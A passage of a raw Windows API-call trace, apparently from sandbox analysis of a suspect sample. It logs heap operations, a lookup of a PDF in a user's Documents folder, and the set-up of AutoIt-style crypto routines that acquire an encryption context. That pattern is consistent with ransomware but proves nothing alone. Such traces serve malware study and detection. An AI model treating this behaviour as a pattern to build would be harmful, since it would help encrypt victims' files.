[0267.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0267.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0267.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0267.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0267.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0267.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0267.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0267.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0267.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0267.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0267.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0267.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0267.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0267.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0267.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0267.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0267.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0267.197] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/R8WIHAk.pdf", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29f367b0, ftCreationTime.dwHighDateTime=0x1d5e2c5, ftLastAccessTime.dwLowDateTime=0x6beea0f0, ftLastAccessTime.dwHighDateTime=0x1d5e45d, ftLastWriteTime.dwLowDateTime=0x6beea0f0, ftLastWriteTime.dwHighDateTime=0x1d5e45d, nFileSizeHigh=0x0, nFileSizeLow=0x850b, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="R8WIHAk.pdf", cAlternateFileName="")) returned 0xa87250 [0267.197] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0267.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0267.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0267.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0267.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0267.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0267.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0267.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0267.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0267.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0267.198] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0267.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0267.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0267.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0267.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0267.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0267.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0267.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0267.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0267.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0267.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0267.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0267.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0267.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0267.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0267.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0267.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0267.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0267.198] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0267.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0267.198] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0267.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0267.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0267.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51790 [0267.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0267.199] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0267.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0267.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0267.199] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0267.199] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0267.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0267.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0267.199] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0267.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0267.200] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0267.200] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0267.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0267.200] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0267.200] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0267.200] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.200] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0267.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0267.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0267.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0267.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0267.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0267.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0267.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0267.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0267.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0267.201] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0267.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0267.201] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0267.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0267.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0267.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0267.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0267.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0267.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0267.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0267.201] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0267.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0267.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0267.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0267.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0267.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0267.201] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.201] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0267.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0267.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0267.202] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0267.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0267.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0267.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0267.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0267.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0267.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0267.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0267.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0267.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0267.202] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0267.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0267.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0267.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0267.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0267.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0267.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0267.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0267.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69988 [0267.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69988, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0267.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0267.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0267.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0267.203] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0267.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0267.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0267.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0267.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0267.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0267.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0267.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0267.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0267.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0267.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0267.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0267.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0267.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0267.203] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0267.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14488 [0267.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0267.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0267.204] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.204] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.204] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0267.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0267.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0267.205] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.205] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0267.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0267.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0267.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0267.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0267.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0267.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0267.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0267.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0267.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.205] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0267.205] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0267.205] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.205] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0267.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0267.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0267.206] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.206] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0267.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0267.206] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.206] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.206] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.206] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.206] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0267.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0267.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0267.206] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.206] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.206] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.207] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.207] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.207] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.207] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0267.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0267.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0267.207] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.207] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0267.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0267.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.207] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0267.207] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0267.217] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.218] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0267.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0267.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0267.218] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 